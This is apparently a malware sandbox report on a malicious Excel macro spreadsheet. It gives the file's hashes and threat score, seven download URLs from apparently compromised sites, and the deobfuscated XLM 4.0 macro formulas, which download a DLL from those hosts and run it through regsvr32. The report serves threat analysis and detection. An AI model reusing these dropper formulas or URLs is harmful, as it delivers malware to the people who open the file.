Overview

overview

10

Static

static

10

fb2c747257...9.xlsm

windows7-x64

10

fb2c747257...9.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    fb2c747257401566f68b9d54fb6df8cb8b8aca892c48e8e0d045922e0eb39019

  • Size

    21KB

  • Sample

    241120-18h8ysthle

  • MD5

    3d8f9e4f46b15a710a5c02e45ec50b2d

  • SHA1

    f6ffdf99a85d4f48c91ac0a0dea42374c7eee770

  • SHA256

    fb2c747257401566f68b9d54fb6df8cb8b8aca892c48e8e0d045922e0eb39019

  • SHA512

    dd033adb814a1c23a244fe93a3c03768f13d3073917ad2a33967191b8070a53cfff750b713cd512da18f94557c2f22ca92ee8f5c9f385dbe8135d99ce85f0dc5

  • SSDEEP

    384:z3uAi/NjIVRS8EibbwBlw75SYrLb5CzgObff9kC+xbX74eII:XsNs/zXtFCBn9kC+xbL42

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.almoeqatar.com/cgi-bin/3g/

http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/

http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/

http://lista33rivera.uy/wp-content/jiBtjSaJMcM/

http://cenaf.com.co/error/TpewL/

http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/

http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.almoeqatar.com/cgi-bin/3g/","..\rfs.dll",0,0) =IF('PCWV'!G13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/","..\rfs.dll",0,0)) =IF('PCWV'!G15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/","..\rfs.dll",0,0)) =IF('PCWV'!G17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://lista33rivera.uy/wp-content/jiBtjSaJMcM/","..\rfs.dll",0,0)) =IF('PCWV'!G19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://cenaf.com.co/error/TpewL/","..\rfs.dll",0,0)) =IF('PCWV'!G21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://pusatbahasa.unsyiah.ac.id/backup/qWzXJpGddclh4zZjt/","..\rfs.dll",0,0)) =IF('PCWV'!G23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://baykusoglu.com.tr/wp-admin/317Sz3wZsYmAAmmL6/","..\rfs.dll",0,0)) =IF('PCWV'!G25<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.almoeqatar.com/cgi-bin/3g/
xlm40.dropper

http://www.ayelet.info/wp-admin/oHRoG0X9ubuNtQ/
xlm40.dropper

http://www.lavameapp.com.ar/slide-images/7bzQevDGMld/
xlm40.dropper

http://lista33rivera.uy/wp-content/jiBtjSaJMcM/
xlm40.dropper

http://cenaf.com.co/error/TpewL/

Targets

    • Target

      fb2c747257401566f68b9d54fb6df8cb8b8aca892c48e8e0d045922e0eb39019

    • Size

      21KB

    • MD5

      3d8f9e4f46b15a710a5c02e45ec50b2d

    • SHA1

      f6ffdf99a85d4f48c91ac0a0dea42374c7eee770

    • SHA256

      fb2c747257401566f68b9d54fb6df8cb8b8aca892c48e8e0d045922e0eb39019

    • SHA512

      dd033adb814a1c23a244fe93a3c03768f13d3073917ad2a33967191b8070a53cfff750b713cd512da18f94557c2f22ca92ee8f5c9f385dbe8135d99ce85f0dc5

    • SSDEEP

      384:z3uAi/NjIVRS8EibbwBlw75SYrLb5CzgObff9kC+xbX74eII:XsNs/zXtFCBn9kC+xbL42

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks